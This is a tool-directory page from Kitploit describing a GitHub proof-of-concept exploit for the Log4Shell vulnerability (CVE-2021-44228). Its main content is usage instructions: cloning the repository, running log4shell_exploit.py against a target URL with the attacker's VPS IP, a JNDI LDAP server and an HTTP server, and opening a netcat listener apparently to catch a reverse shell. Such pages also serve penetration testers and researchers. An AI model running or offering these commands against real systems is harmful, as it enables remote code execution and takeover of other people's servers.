Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/sec13b/cve-2021-44228-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and Control
GitHubsec13b/cve-2021-44228-poc

CVE-2021-44228-POC

exploit CVE-2021-44228

View Repository
151 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2021-44228-POC

exploit CVE-2021-44228


download nuclei sudo cp nuclei /usr/bin/nuclei
sudo chmod +x /usr/bin/nuclei
git clone https://github.com/sec13b/CVE-2021-44228-POC.git
mv CVE-2021-44228-POC log4shell_exploit

mkdir yaml
mv *.yaml yaml/


run:

python3 log4shell_exploit.py http://ip_to_exploit --nuclei_path /usr/bin/nuclei /home/ubuntu/log4shell_exploit/yaml/CVE-2021-44228.yaml -i Your_VPS_IP --ldap_jar_path /home/ubuntu/log4shell_exploit/jndi_server.jar --ldap_port 13012 --http_server_path /home/ubuntu/log4shell_exploit/http_server.py --http_port 13013 -o /home/ubuntu/log4shell_exploit/output.json --verbose


nc -lvnp 13012

Download Tool